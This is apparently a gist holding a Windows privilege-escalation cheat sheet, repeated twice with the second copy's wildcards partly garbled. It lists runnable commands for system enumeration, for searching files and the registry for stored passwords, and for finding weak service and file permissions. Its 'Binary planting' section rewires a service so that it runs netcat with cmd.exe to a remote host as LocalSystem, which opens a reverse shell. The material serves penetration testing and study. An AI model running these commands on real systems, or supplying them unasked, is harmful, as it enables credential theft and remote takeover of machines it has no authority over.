api0cradle/windows_privesc

## windows_privesc
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

// Networking stuff
ipconfig /all

// Printer?
route print

// ARP-arific
arp -A

// Active network connections
netstat -ano

// Firewall fun (Win XP SP2+ only)
netsh firewall show state
netsh firewall show config

// Scheduled tasks
schtasks /query /fo LIST /v

// Running processes to started services
tasklist /SVC
net start

// Driver madness
DRIVERQUERY

// WMIC fun (Win 7/8 -- XP requires admin)
wmic /?
# Use wmic_info script!

// WMIC: check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn

// Search pathces for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

// AlwaysInstallElevated fun
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

// Other commands to run to hopefully get what we need
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

// Service permissions
sc query
sc qc [service_name]

// Accesschk stuff
accesschk.exe /accepteula (always do this first!!!!!)
accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
accesschk.exe -ucqv [service_name]

// Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

// Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

// Binary planting
sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
sc qc [service_name] (to verify!)
net start [service_name]

Mostly all of this taken from http://www.fuzzysecurity.com/tutorials/16.html
	// What system are we connected to?
	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	// Get the hostname and username (if available)
	hostname
	echo %username%

	// Get users
	net users
	net user [username]

	// Networking stuff
	ipconfig /all

	// Printer?
	route print

	// ARP-arific
	arp -A

	// Active network connections
	netstat -ano

	// Firewall fun (Win XP SP2+ only)
	netsh firewall show state
	netsh firewall show config

	// Scheduled tasks
	schtasks /query /fo LIST /v

	// Running processes to started services
	tasklist /SVC
	net start

	// Driver madness
	DRIVERQUERY

	// WMIC fun (Win 7/8 -- XP requires admin)
	wmic /?
	# Use wmic_info script!

	// WMIC: check patch level
	wmic qfe get Caption,Description,HotFixID,InstalledOn

	// Search pathces for given patch
	wmic qfe get Caption,Description,HotFixID,InstalledOn \| findstr /C:"KB.." /C:"KB.."

	// AlwaysInstallElevated fun
	reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

	// Other commands to run to hopefully get what we need
	dir /s pass == cred == vnc == .config
	findstr /si password .xml .ini *.txt
	reg query HKLM /f password /t REG_SZ /s
	reg query HKCU /f password /t REG_SZ /s

	// Service permissions
	sc query
	sc qc [service_name]

	// Accesschk stuff
	accesschk.exe /accepteula (always do this first!!!!!)
	accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
	accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
	accesschk.exe -ucqv [service_name]

	// Find all weak folder permissions per drive.
	accesschk.exe -uwdqs Users c:\
	accesschk.exe -uwdqs "Authenticated Users" c:\

	// Find all weak file permissions per drive.
	accesschk.exe -uwqs Users c:\.
	accesschk.exe -uwqs "Authenticated Users" c:\.

	// Binary planting
	sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
	sc config [service_name] obj= ".\LocalSystem" password= ""
	sc qc [service_name] (to verify!)
	net start [service_name]

	Mostly all of this taken from http://www.fuzzysecurity.com/tutorials/16.html